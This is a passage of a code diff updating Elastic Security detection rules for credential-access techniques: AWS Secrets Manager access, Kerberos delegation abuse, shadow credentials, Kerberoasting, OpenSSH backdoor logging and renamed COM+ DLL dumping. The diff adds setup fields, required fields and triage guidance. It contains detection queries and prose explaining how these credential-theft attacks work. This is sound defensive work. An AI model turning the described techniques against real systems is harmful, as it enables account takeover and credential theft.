and\n (process.pe.original_file_name:\"vaultcmd.exe\" or process.name:\"vaultcmd.exe\") and\n process.args:\"/list*\"\n", "references": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json index 6d0d4c8d112a4..14af6936e126a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json @@ -16,22 +16,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Access Secret in Secrets Manager", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Access Secret in Secrets Manager\n\nAWS Secrets Manager is a service that enables the replacement of hardcoded credentials in code, including passwords, with\nan API call to Secrets Manager to retrieve the secret programmatically.\n\nThis rule looks for the retrieval of credentials using the API `GetSecretValue` action.\n\n#### Possible investigation steps\n\n- Identify the account and its role in the environment, and inspect the related policy.\n- Identify the applications that should use this account.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Investigate abnormal values in the `user_agent.original` field by comparing them with the intended and authorized usage\nand historical data. Suspicious user agent values include non-SDK, AWS CLI, custom user agents, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Review IAM permission policies for the user identity and specific secrets accessed.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher\nconfidence. Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Rotate secrets or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:secretsmanager.amazonaws.com and event.action:GetSecretValue\n", "references": [ "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", "http://detectioninthe.cloud/credential_access/access_secret_in_secrets_manager/" ], - "risk_score": 73, + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, "rule_id": "a00681e3-9ed6-447c-ab2c-be648821c622", - "severity": "high", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", "tags": [ "Elastic", "Cloud", "AWS", "Continuous Monitoring", "SecOps", - "Data Protection" + "Data Protection", + "Credential Access" ], "threat": [ { @@ -52,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json index baa66851cb366..1e42d2bc70e1a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json @@ -11,7 +11,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Sensitive Privilege SeEnableDelegationPrivilege assigned to a User", - "note": "## Triage and analysis\n\n### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User\n\nKerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts,\nact on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured\nfor user and computer objects.\n\nEnabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket\n(TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation\nwhen needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they\ncould extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged\nuser to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will\nbe able to pass-the-ticket to privileged assets.\n\nSeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller\nand is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for\ndelegation**.\n\nIt is critical to control the assignment of this privilege. A user with this privilege and write access to a computer\ncan control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to\nthe system. \n\n#### Possible investigation steps\n\n- Investigate how the privilege was assigned to the user and who assigned it.\n- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the\n`user.id` and `winlog.activity_id` fields as a filter during the past 48 hours.\n- Investigate other alerts associated with the users/host during the past 48 hours.\n\n### False positive analysis\n\n- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your\nenvironment legitimately, the security team should notify the administrators about the risks of using it.\n\n### Related rules\n\n- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Remove the privilege from the account.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```\n", + "note": "## Triage and analysis\n\n### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User\n\nKerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts,\nact on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured\nfor user and computer objects.\n\nEnabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket\n(TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation\nwhen needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they\ncould extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged\nuser to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will\nbe able to pass-the-ticket to privileged assets.\n\nSeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller\nand is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for\ndelegation**.\n\nIt is critical to control the assignment of this privilege. A user with this privilege and write access to a computer\ncan control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to\nthe system.\n\n#### Possible investigation steps\n\n- Investigate how the privilege was assigned to the user and who assigned it.\n- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the\n`user.id` and `winlog.activity_id` fields as a filter during the past 48 hours.\n- Investigate other alerts associated with the users/host during the past 48 hours.\n\n### False positive analysis\n\n- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your\nenvironment legitimately, the security team should notify the administrators about the risks of using it.\n\n### Related rules\n\n- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Remove the privilege from the account.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.action: \"Authorization Policy Change\" and event.code:4704 and winlog.event_data.PrivilegeList:\"SeEnableDelegationPrivilege\"\n", "references": [ "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", @@ -20,8 +20,26 @@ "https://www.thehacker.recipes/ad/movement/kerberos/delegations", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0105_windows_audit_authorization_policy_change.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", + "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json index 5c9fc3f5777ed..b952b613909af 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json @@ -14,15 +14,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Shadow Credentials added to AD Object", - "note": "## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n", + "note": "", "query": "event.action:\"Directory Service Changes\" and event.code:\"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"msDS-KeyCredentialLink\"\n", "references": [ "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials", "https://github.com/OTRF/Set-AuditRule" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json index e7f5161885910..5c570d11b0263 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json @@ -11,8 +11,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "User account exposed to Kerberoasting", - "note": "## Triage and analysis\n\n### Investigating User account exposed to Kerberoasting\n\nService Principal Names (SPNs) are names by which Kerberos clients uniquely identify service instances for Kerberos target\ncomputers.\n\nBy default, only computer accounts have SPNs, which creates no significant risk, since machine accounts have a default\ndomain policy that rotates their passwords every 30 days, and the password is composed of 120 random characters, making\nthem invulnerable to Kerberoasting.\n\nA user account with an SPN assigned is considered a service account, and is accessible to the entire domain. If any\nuser in the directory requests a ticket-granting service (TGS), the domain controller will encrypt it with the secret\nkey of the account executing the service. An attacker can potentially perform a Kerberoasting attack with this\ninformation, as the human-defined password is likely to be less complex.\n\nFor scenarios where SPNs cannot be avoided on user accounts, Microsoft provides the Group Managed Service Accounts (gMSA)\nfeature, which ensures that account passwords are robust and changed regularly and automatically. More information can\nbe found [here](https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview).\n\nAttackers can also perform \"Targeted Kerberoasting\", which consists of adding fake SPNs to user accounts that they have\nwrite privileges to, making them potentially vulnerable to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate if the target account is a member of privileged groups (Domain Admins, Enterprise Admins, etc.).\n- Investigate if tickets have been requested for the target account.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The use of user accounts as service accounts is a bad security practice and should not be allowed in the domain. The\nsecurity team should map and monitor any potential benign true positive (B-TP), especially if the account is privileged.\nDomain Administrators that define this kind of setting can put the domain at risk as user accounts don't have the same\nsecurity standards as computer accounts (which have long, complex, random passwords that change frequently), exposing\nthem to credential cracking attacks (Kerberoasting, brute force, etc.).\n\n### Response and remediation \n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n", - "query": "event.action:\"Directory Service Changes\" and event.code:5136 and winlog.event_data.ObjectClass:\"user\" \nand winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\"\n", + "note": "## Triage and analysis\n\n### Investigating User account exposed to Kerberoasting\n\nService Principal Names (SPNs) are names by which Kerberos clients uniquely identify service instances for Kerberos target\ncomputers.\n\nBy default, only computer accounts have SPNs, which creates no significant risk, since machine accounts have a default\ndomain policy that rotates their passwords every 30 days, and the password is composed of 120 random characters, making\nthem invulnerable to Kerberoasting.\n\nA user account with an SPN assigned is considered a service account, and is accessible to the entire domain. If any\nuser in the directory requests a ticket-granting service (TGS), the domain controller will encrypt it with the secret\nkey of the account executing the service. An attacker can potentially perform a Kerberoasting attack with this\ninformation, as the human-defined password is likely to be less complex.\n\nFor scenarios where SPNs cannot be avoided on user accounts, Microsoft provides the Group Managed Service Accounts (gMSA)\nfeature, which ensures that account passwords are robust and changed regularly and automatically. More information can\nbe found [here](https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview).\n\nAttackers can also perform \"Targeted Kerberoasting\", which consists of adding fake SPNs to user accounts that they have\nwrite privileges to, making them potentially vulnerable to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate if the target account is a member of privileged groups (Domain Admins, Enterprise Admins, etc.).\n- Investigate if tickets have been requested for the target account.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The use of user accounts as service accounts is a bad security practice and should not be allowed in the domain. The\nsecurity team should map and monitor any potential benign true positive (B-TP), especially if the account is privileged.\nDomain Administrators that define this kind of setting can put the domain at risk as user accounts don't have the same\nsecurity standards as computer accounts (which have long, complex, random passwords that change frequently), exposing\nthem to credential cracking attacks (Kerberoasting, brute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.action:\"Directory Service Changes\" and event.code:5136 and winlog.event_data.ObjectClass:\"user\"\nand winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\"\n", "references": [ "https://www.thehacker.recipes/ad/movement/access-controls/targeted-kerberoasting", "https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/", @@ -21,8 +21,31 @@ "https://adsecurity.org/?p=280", "https://github.com/OTRF/Set-AuditRule" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectClass", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -58,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json index 9e45afac8f290..17d6623ed2330 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json @@ -14,14 +14,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential OpenSSH Backdoor Logging Activity", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n file.name : (\".*\", \"~*\") or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path : \n (\n \"/private/etc/*--\", \n \"/usr/share/*\", \n \"/usr/include/*\", \n \"/usr/local/include/*\", \n \"/private/tmp/*\", \n \"/private/var/tmp/*\",\n \"/usr/tmp/*\", \n \"/usr/share/man/*\", \n \"/usr/local/share/*\", \n \"/usr/lib/*.so.*\", \n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\", \n \"/private/var/opt/power\", \n \"/private/etc/ssh/ssh_known_hosts\", \n \"/private/var/html/lol\", \n \"/private/var/log/utmp\", \n \"/private/var/lib\",\n \"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", + "note": "", + "query": "file where event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n (file.name : (\".*\", \"~*\", \"*~\") and not file.name : (\".cache\", \".viminfo\", \".bash_history\")) or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path :\n (\n \"/private/etc/*--\",\n \"/usr/share/*\",\n \"/usr/include/*\",\n \"/usr/local/include/*\",\n \"/private/tmp/*\",\n \"/private/var/tmp/*\",\n \"/usr/tmp/*\",\n \"/usr/share/man/*\",\n \"/usr/local/share/*\",\n \"/usr/lib/*.so.*\",\n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\",\n \"/private/var/opt/power\",\n \"/private/etc/ssh/ssh_known_hosts\",\n \"/private/var/html/lol\",\n \"/private/var/log/utmp\",\n \"/private/var/lib\",\n \"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", "references": [ "https://github.com/eset/malware-ioc/tree/master/sshdoor", "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -65,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json index 3f286081c49f2..0e92fa8991092 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Storage Account Key Regenerated", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1e0b832e-957e-43ae-b319-db82d228c908", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json index 5b27c1ea0694c..9d6aed291fd03 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json @@ -11,13 +11,56 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Renamed COM+ Services DLL", - "note": "## Config\n\nYou will need to enable logging of ImageLoads in your Sysmon configuration to include COMSVCS.DLL by Imphash or Original\nFile Name.", + "note": "", "query": "sequence by process.entity_id with maxspan=1m\n [process where event.category == \"process\" and\n process.name : \"rundll32.exe\"]\n [process where event.category == \"process\" and event.dataset : \"windows.sysmon_operational\" and event.code == \"7\" and\n (file.pe.original_file_name : \"COMSVCS.DLL\" or file.pe.imphash : \"EADBCCBB324829ACB5F2BBE87E5549A8\") and\n /* renamed COMSVCS */\n not file.name : \"COMSVCS.DLL\"]\n", "references": [ "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": 